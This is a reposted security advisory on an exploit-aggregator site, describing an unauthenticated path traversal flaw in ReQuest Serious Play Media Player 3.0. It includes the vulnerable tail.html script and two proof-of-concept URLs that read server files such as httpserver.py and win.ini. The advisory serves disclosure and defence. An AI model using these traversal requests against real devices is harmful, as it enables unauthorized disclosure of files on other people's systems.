Advertisement






ReQuest Serious Play Media Player 3.0 File Disclosure / Path Traversal

CVE Category Price Severity
CVE-2021-3399 CWE-22 Unknown High
Author Risk Exploitation Type Date
Emirald Matoshi High Remote 2020-10-19
CPE
cpe:cpe:/a:serious_play:media_player:3.0
CVSS EPSS EPSSP
Not explicitly provided in the URL, please refer to the site for specific CVSS score 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100119

Below is a copy:

ReQuest Serious Play Media Player 3.0 File Disclosure / Path Traversal
ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability


Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 3.0.0
                  2.1.0.831
                  1.5.2.822
                  1.5.2.821
                  1.5.1.820

Summary: With the MediaPlayer, ReQuest delivers video content and award-winning
distributed music capabilities. Up to 4 MediaPlayers (15 when coupled with an
approved NAS) can be connected through your home network to your ReQuest system,
delivering HD video to your television in 1080p via HDMI outputs.

Desc: The device suffers from an unauthenticated file disclosure vulnerability
when input passed through the 'file' parameter in tail.html and file.html script
is not properly verified before being used to read web log files. This can be
exploited to disclose contents of files from local resources.

===============================================================================
/tail.html:
-----------

function load_data()
{

   var elem = $("#data");
   $.ajax({url:"tail.html", 
           data:{
                 file:elem.attr("file"),
                 start:elem.attr("nextstart"),
                 tail:elem.attr("tail")?elem.attr("tail"):undefined,
                 max:elem.attr("max")?elem.attr("max"):undefined},
                 cache:false,
                 async:true,
                 success:show_data}
                 );
}

function main_start()
{

   $("#data").attr({"nextstart": 0, "max": "", "tail": 10000, "update": 5, "file": "C:\\\\ReQuest\\\\mpweb\\log\\mpweb.log"});
   window.setTimeout(load_data, 1);
}

function show_data(data, status, jqxhr)
{
   var data = $("filedata", data);
   var newdata = data.attr("data");
   var start = data.attr("start");
   var nextstart = data.attr("nextstart");
   var elem = $("#data");
   var at_end = ($(document).scrollTop()>=$(document).height()-window.innerHeight-20);
   elem.attr({tail:"", start:start, nextstart:nextstart});
   if (newdata.length)
      elem.append(htmlspecialchars(newdata));
   var delay = parseFloat(elem.attr("update"))*1000;
   if (isNaN(delay))
      delay = 5000;
   if (at_end)
      $("html,body").scrollTop($(document).height());
   window.setTimeout(load_data, delay);
}

$(document).ready(main_start);

===============================================================================

Tested on: ReQuestHTTP/0.1 httpserver/0.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5599
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5599.php


01.08.2020

--


http://192.168.1.17:8001/tail.html?file=C:\\ReQuest\\mpweb\httpserver.py
http://192.168.1.17:8001/file.html?file=C:\windows\win.ini

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.